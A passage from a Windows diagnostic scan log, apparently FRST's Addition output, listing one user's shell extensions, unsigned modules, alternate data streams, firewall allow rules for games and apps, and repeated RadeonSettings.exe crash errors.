CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{2F81B25E-7507-4844-BFF2-77D2CC24CED4}\localserver32 -> C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Inc. -> Adobe Inc.)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{9E121B07-D732-48C1-94D0-77C233EAE0F3} -> [MEGAsync] => C:\Users\Miggy\Documents\MEGAsync [2022-06-05 15:01]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{d1b22d3d-8585-53a6-acb3-0e803c7e8d2a}\localserver32 -> "C:\Users\Miggy\AppData\Local\Microsoft\Teams\current\Teams.exe" --toast => No File
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Inc. -> Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-04-24] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\nvshext.dll [2022-04-21] (Nvidia Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
2022-07-12 17:36 - 2021-11-11 04:03 - 001495552 _____ () [File not signed] C:\Program Files (x86)\ONN\DuiLib.dll
2022-07-12 17:36 - 2018-09-06 03:45 - 000045056 _____ () [File not signed] C:\Program Files (x86)\ONN\HookDLL.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000015360 _____ () [File not signed] C:\Program Files (x86)\Origin\libEGL.DLL
2022-07-05 18:54 - 2022-07-05 18:54 - 003090944 _____ () [File not signed] C:\Program Files (x86)\Origin\libGLESv2.dll
2022-07-12 17:36 - 2019-07-18 06:35 - 000049152 _____ (0) [File not signed] C:\Program Files (x86)\ONN\CommFunc.dll
2022-07-12 17:36 - 2019-08-17 03:25 - 000119296 _____ (0) [File not signed] C:\Program Files (x86)\ONN\DrvInDll.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000002560 _____ (The ICU Project) [File not signed] C:\Program Files (x86)\Origin\icudt58.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001252864 _____ (The ICU Project) [File not signed] C:\Program Files (x86)\Origin\icuuc58.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\LIBEAY32.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\ssleay32.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 002815488 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libcrypto-1_1-x64.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 000678400 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libssl-1_1-x64.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000030208 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qgif.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000032768 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qico.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000256512 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qjpeg.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000026112 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qtga.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000305152 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qtiff.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000025600 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qwbmp.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001611264 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005487104 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Core.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005841920 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Gui.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000709120 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Multimedia.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001179136 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Network.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000207360 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Positioning.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000310272 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5PrintSupport.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 003513344 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Qml.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 003390976 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Quick.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000068096 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5QuickWidgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000045568 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5TextToSpeech.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000116224 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebChannel.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 054071296 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebEngineCore.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000211456 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebEngineWidgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000146432 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005089792 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000184832 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Xml.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 000046592 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\bearer\qgenericbearer.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 006270976 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Core.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 001389568 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Network.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 000157184 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5WebSockets.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 000210432 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Xml.dll
2021-09-14 00:46 - 2022-07-23 18:23 - 005979824 _____ (The Qt Company Oy -> The Qt Company Ltd.) [File not signed] C:\Users\Miggy\AppData\Local\MEGAsync\Qt5Core.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log:AAE9D2281E [4298]
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log_backup1:E79F04DA79 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log:5ACBC90093 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1:A416BDA264 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log:204739A7F2 [4298]
AlternateDataStreams: C:\ProgramData\rsEngine.config.backup:CF02139FF4 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [4298]
AlternateDataStreams: C:\Users\Miggy\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Miggy\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [490]
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2018-04-11 16:38 - 2018-04-11 16:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Miggy\Downloads\FXHeNR8WYAAmLXM.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [TCP Query User{75F1F7B6-893C-4C9A-8BEB-1A01FE14D19B}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{C570E9D4-54C7-4C8E-BFE2-33790B0CDEE4}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{512DD18C-E03C-4F68-ADDB-C1B6C668DE92}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{BDFC16B9-6362-4C4F-B63A-563BB28D6D95}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{D375EA9F-C466-429B-9310-86A9AF754CE7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{1111D7E9-0263-4BEA-AE48-5814F94C25AE}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [TCP Query User{E129FC62-A6F4-43F0-A596-705A65A6ECBE}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [UDP Query User{8B14CB93-57E1-4205-86E0-9D64AD5CD2C2}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [{E4D8E207-53E2-4BCA-857B-95C442C4A003}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{8E1288D1-FF8B-43CF-B774-BAF7368A878E}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{07AEC99C-D78B-40D8-81B3-B6A57F65D5B2}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E69E5D28-B7DD-46AB-BEAB-C839E5454B7D}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{B37C3BEA-90A8-4571-B32B-A3D32D66E996}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{01812E29-A7AD-4EE9-8996-E4D05D2A9287}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [{630E1402-F874-4FED-87A1-27FF1098A671}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [{442AD7B1-9864-41C2-987F-C9207D6685D1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [File not signed]
FirewallRules: [{04B6391E-7D83-45FF-A254-ED38AB86EED9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [File not signed]
FirewallRules: [TCP Query User{D31632D6-BD4D-4CF9-BDBA-615A660D8175}C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe] => (Allow) C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe (Plutonium Project -> Plutonium Project) [File not signed]
FirewallRules: [UDP Query User{D69435F2-BA58-463D-B859-6BEF8812CA30}C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe] => (Allow) C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe (Plutonium Project -> Plutonium Project) [File not signed]
FirewallRules: [{EC5AA6B0-DC8D-4280-B23B-A4BFF1925284}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Slappyball\Smackball.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{FFBFCEFF-753E-47D9-A86B-A9B045A20B5E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Slappyball\Smackball.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{E265D979-F29E-4142-AD18-6FE8ACA0E024}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe (Bethesda Softworks) [File not signed]
FirewallRules: [{4BCC34F1-1289-481C-AF43-C75646E09D08}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe (Bethesda Softworks) [File not signed]
FirewallRules: [{CDBE68AB-7DCB-46F1-9F35-6F893AD3884D}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\103.0.1264.71\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{74D3033E-C185-4B6B-A5E4-69A9816ED816}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{F1B8821F-0E16-4528-B1BB-79C8017CBFDF}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [{490A1CA8-F6A2-460A-A5B0-E670FA556A14}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\MultiVersus\start_protected_game.exe (EasyAntiCheat Oy -> Epic Games, Inc.)
FirewallRules: [{35EEA0A0-6565-4591-AABF-1C31911C42CE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\MultiVersus\start_protected_game.exe (EasyAntiCheat Oy -> Epic Games, Inc.)
FirewallRules: [{53C48A63-A19E-49EF-9F5D-8566D06C5B5D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe () [File not signed]
FirewallRules: [{4F014064-D571-4011-B69C-D305F76DE335}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe () [File not signed]
FirewallRules: [{62F86B99-E850-4A82-B6D8-94A1F14EEDCA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\launch.exe () [File not signed]
FirewallRules: [{B7FE4BFB-2CE5-4A4B-8A1C-5BB196B30BEE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\launch.exe () [File not signed]
FirewallRules: [{A720A792-6D7C-4D3A-A43B-C2569E3AC5DE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Smithworks\Smithworks.exe () [File not signed]
FirewallRules: [{D17CF793-FDB0-4C9A-A5B7-379C6D2E4ED8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Smithworks\Smithworks.exe () [File not signed]
FirewallRules: [{5F5E602D-A8A9-4B7B-AEE0-8991DD5FDC98}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{79F916FF-1F98-4D48-B9AD-451D26DDABDC}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1A2A000D-6973-47B0-B7FA-084089B890D8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PUBG\TslGame\Binaries\Win64\ExecPubg.exe (PUBG CORPORATION -> KRAFTON, Inc.)
FirewallRules: [{BE7848C9-7E7D-4E92-81BC-54B9F3633A89}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PUBG\TslGame\Binaries\Win64\ExecPubg.exe (PUBG CORPORATION -> KRAFTON, Inc.)
FirewallRules: [TCP Query User{47557B71-C419-461C-B71D-C7B5CF9D322F}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe (PUBG CORPORATION -> Bluehole GinnoGames, Inc.)
FirewallRules: [UDP Query User{F5283E9F-F459-4FED-A7A4-1185B4C7201D}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe (PUBG CORPORATION -> Bluehole GinnoGames, Inc.)
FirewallRules: [{2A1C900E-74CF-486D-8DB1-2924648A3F05}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Persona 4 Golden\P4G.exe (Sega of America, Inc. -> )
FirewallRules: [{A50BE433-7223-4225-B5F4-B7C048C34573}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Persona 4 Golden\P4G.exe (Sega of America, Inc. -> )
FirewallRules: [{A69F9987-45DC-4249-9754-82AC3254FA33}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{FA3B8DC8-1970-4318-A508-C5DB0AB85F72}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{0BA2BB81-F405-4C41-8A82-90027F4066CE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe (Smartly Dressed Games Ltd. -> )
FirewallRules: [{4FDB42C1-2FF9-4789-9695-2B3F09C5C381}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe (Smartly Dressed Games Ltd. -> )
==================== Restore Points =========================
25-07-2022 17:41:25 Scheduled Checkpoint
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (07/30/2022 01:23:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0xbc8
Faulting application start time: 0x01d8a45184d675b1
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: a52e07d1-d510-4772-9459-32ddf8d9220c
Faulting package full name:
Faulting package-relative application ID:
Error: (07/29/2022 11:15:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x3234
Faulting application start time: 0x01d8a3db061eb0b9
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 4c877615-e64f-4e15-b5c4-e6f3d637ebd5
Faulting package full name:
Faulting package-relative application ID:
Error: (07/29/2022 07:41:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x506c
Faulting application start time: 0x01d8a3bd1bcae0e7
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 52de9d46-fef6-42ef-a8e7-693aa0ab3c68
Faulting package full name:
Faulting package-relative application ID:
Error: (07/28/2022 10:48:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1f7c
Faulting application start time: 0x01d8a30e27ba11a7
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 4d45f120-de8c-494d-8dd9-102a058bf283
Faulting package full name:
Faulting package-relative application ID:
Error: (07/28/2022 10:40:43 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program steam.exe version 7.39.75.64 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 4214
Start Time: 01d8a2bd4aa673e5
Termination Time: 4294967295
Application Path: C:\Program Files (x86)\Steam\steam.exe
Report Id: a9bd0a6e-73d8-410f-a873-43cf89cbdeef
Faulting package full name:
Faulting package-relative application ID:
Hang type: Top level window is idle
Error: (07/28/2022 12:48:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x2568
Faulting application start time: 0x01d8a2ba4968b967
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 290fe698-37e9-4610-83e8-7314ee0cd95a
Faulting package full name:
Faulting package-relative application ID:
Error: (07/27/2022 06:04:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1e44
Faulting application start time: 0x01d8a21d3f5eb549
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: af8d65d1-c8c5-4eaa-a9a1-f03c0e92dd7f
Faulting package full name:
Faulting package-relative application ID:
Error: (07/26/2022 04:24:08 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Security Center failed to validate caller with error %1.
System errors:
=============
Error: (07/30/2022 01:14:36 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {F9717507-6651-4EDB-BFF7-AE615179BCCF} did not register with DCOM within the required timeout.
